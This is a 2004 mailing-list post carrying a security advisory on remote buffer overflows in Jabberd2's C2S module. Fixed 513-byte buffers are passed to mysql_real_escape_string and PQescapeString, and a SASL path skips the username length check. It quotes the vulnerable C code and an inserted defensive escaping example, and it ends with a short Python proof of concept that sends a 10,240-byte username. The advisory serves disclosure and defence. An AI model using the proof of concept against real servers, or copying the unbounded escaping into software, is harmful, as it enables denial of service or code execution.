[jadmin] Jabberd2 remote vulns

icbm icbm at venustech.com.cn
Mon Nov 22 01:54:09 CST 2004


Hi guys:

       I found something funny in the jabber2s2 and jabberd2s3, but it may also
affect the s4; more details in the attachment.

Zhaowei

-- 
------------------------------------------------------------------------                                                   
Company:                                            www.venustech.com.cn
SST:                                                       www.0x557.org
My blog:                                             blog.0x557.org/icbm
------------------------------------------------------------------------
My GPG-Key:            gpg --keyserver pgp.mit.edu --recv-key 0xFCC66634
Key Fingerprint:      84C2 A55A F5A5 34A0 16B3  3691 8473 A1AF FCC6 6634
------------------------------------------------------------------------

-------------- next part --------------
[Security Advisory]

Advisory: [AD_LAB-04002] Jabberd2.x remote Buffer Overflows
Authors: icbm at venustech.com.cn
Class: Boundary Condition Error
Remote: Yes, could allow remote compromise

Vulnerable: Jabberd 2
Not vulnerable: Jabberd 1.4
Vendor: http://jabberd.jabberstudio.org/ 

I.INFO: 
-------

Jabber 2 server (Jabberd) is the latest release of the popular open source messaging system based
on the Jabber protocol. It has been rewritten from the ground up to be scalable, architecturally
sound, and to support the latest protocol extensions coming out of the JSF. The goal of Jabber
is to provide an XML protocol for synchronous and asynchronous communication for client-to-client,
client-to-server, and server-to-server messaging, although the primary use of Jabber is instant
messaging (IM).

The C2S (Client to Server) component handles communication with Jabber clients:
1. Connects to Jabber clients
2. Passes packets to the SM
3. Authenticates clients
4. Registers users
5. Triggers activity with the SM
The C2S component connects to the Authentication Data Package (authreg) in order to register
and authenticate users.

II.DESCRIPTION: 
---------------

There is a remote buffer overflow in the C2S module of Jabberd2.x which allows attackers to
crash the Jabberd server or even run arbitrary code on it.

The nature of this vulnerability lies in the fact that an attacker can bypass the length check
on the username and password and supply a very long username to the server, which passes the
long username directly to a database-related function such as mysql_real_escape_string or
PQescapeString, causing a remote buffer overflow.


III.DETAILS:
------------

In the authreg.c (c2s) file the jabberd server cuts the length of the username with this:

    snprintf(username, 1024, "%.*s", NAD_CDATA_L(nad, elem), NAD_CDATA(nad, elem));

So we believe the max length of the username is 1024. The first problem is in
authreg_mysql.c:

static MYSQL_RES *_ar_mysql_get_user_tuple(authreg_t ar, char *username, char *realm) {
    mysqlcontext_t ctx = (mysqlcontext_t) ar->private;
    MYSQL *conn = ctx->conn;
    char euser[513], erealm[513], sql[2049]; /* euser and erealm are only 513 bytes */
    MYSQL_RES *res;

    if(mysql_ping(conn) != 0) {
        log_write(ar->c2s->log, LOG_ERR, "mysql: connection to database lost");
        return NULL;
    }

    mysql_real_escape_string(conn, euser, username, strlen(username)); /* here is the buffer overflow */
    mysql_real_escape_string(conn, erealm, realm, strlen(realm));      /* and there is another one here */

Since the escaped buffer must be (strlen(username)*2)+1 bytes long, a username or realm longer than
256 bytes overflows it. But when we patched the hole by increasing euser and erealm to 2049 bytes
(1024*2+1), there was still a buffer overflow.

The data flow is:

_sx_sasl_scod_callback(sasl.c:501)
    |
    |-----> _c2s_sx_sasl_callback(main.c:264)
            |
            |-----> _ar_mysql_get_password(authreg_mysql.c:92)
                    |
                    |-----> _ar_mysql_get_user_tuple(authreg_mysql.c:42)

So we find the essence of this problem: in _c2s_sx_sasl_callback (c2s/main.c) the server directly
calls the database-related function on the username without any length check, so the 1024-byte
snprintf cut in authreg.c is never applied on the SASL path.

BTW: the file authreg_pgsql.c has the same problem; the code is below:

    char euser[513], erealm[513], sql[2049];    /* query(1024) + euser(512) + erealm(512) + \0(1) */
    PGresult *res;

    PQescapeString(euser, username, strlen(username));
    PQescapeString(erealm, realm, strlen(realm));
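As an added example (not jabberd2's code), this is the defensive pattern both the mysql and pgsql snippets above lack: size the destination for the 2*len+1 worst case of the escaper, gate the input at the 1024-byte limit the c2s code intends, and refuse rather than write when the buffer is too small. The escaper here is a constructed stand-in that backslash-escapes the same byte set as mysql_real_escape_string, so it runs without libmysqlclient.

```c
/* Added example, not jabberd2 code: bounded escaping with the same 2*len+1
 * growth contract as mysql_real_escape_string / PQescapeString. A fixed
 * 513-byte destination therefore holds at most 256 input bytes. */
#include <stddef.h>
#include <string.h>

#define MAX_USERNAME 1024   /* the snprintf(..., 1024, ...) limit in c2s authreg.c */

/* Worst-case output size: every input byte may become two, plus the NUL. */
static size_t escaped_capacity_needed(size_t len) {
    return len * 2 + 1;
}

/* Escape src into dst[dstsz]. Returns 1 on success, 0 if the input is over
 * the username limit or would not fit; on 0 nothing is written.
 * Assumption (constructed stand-in, not the real library): the byte set
 * escaped is ' " \ \n \r and Ctrl-Z, as mysql_real_escape_string does. */
static int safe_escape(char *dst, size_t dstsz, const char *src) {
    size_t len = strlen(src), o = 0;
    if (len > MAX_USERNAME) return 0;                   /* gate the SASL callback path */
    if (dstsz < escaped_capacity_needed(len)) return 0; /* reject instead of overflowing */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)src[i];
        switch (c) {
        case '\n': dst[o++] = '\\'; dst[o++] = 'n'; break;
        case '\r': dst[o++] = '\\'; dst[o++] = 'r'; break;
        case 0x1a: dst[o++] = '\\'; dst[o++] = 'Z'; break;
        case '\'': case '"': case '\\':
            dst[o++] = '\\'; dst[o++] = (char)c; break;
        default:   dst[o++] = (char)c; break;
        }
    }
    dst[o] = '\0';
    return 1;
}

/* Does an n-byte username made entirely of quotes (the worst case) fit the
 * original 513-byte euser buffer without overflowing? */
static int fits_513(size_t n) {
    char user[2048], euser[513];
    if (n >= sizeof user) return 0;
    memset(user, '\'', n);
    user[n] = '\0';
    return safe_escape(euser, sizeof euser, user);
}
```

With the original 513-byte buffers, fits_513(256) succeeds and fits_513(257) is refused, which is exactly the boundary the advisory describes.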

IV.POC: 
-------

Just a POC :)

#!/usr/bin/python
import xmpp
# username far beyond the 1024 bytes c2s expects
name = 'a'*10240
# create a client (xmpppy)
cl=xmpp.Client('localhost')
if not cl.connect(server=('192.168.10.138',5222)):
    raise IOError('Can not connect to server.')
if not cl.auth(name,'jabberuserpassword','optional resource name'):
    raise IOError('Can not auth with server.')
cl.disconnect()

V.CREDIT: 
---------
Thanks to rob at cataclysm.cx for helping me on this :)
Sam, Air, Flashsky, S0f, Cjj and all Venustech AD-Lab guys...

VI.DISCLAIMER:
-------------

The information in this bulletin is provided "AS IS" without warranty of any
kind. In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages. 

Copyright 1996-2004 VENUSTECH. All Rights Reserved. Terms of use.

VENUSTECH Security Lab 
VENUSTECH INFORMATION TECHNOLOGY CO.,LTD(http://www.venustech.com.cn)

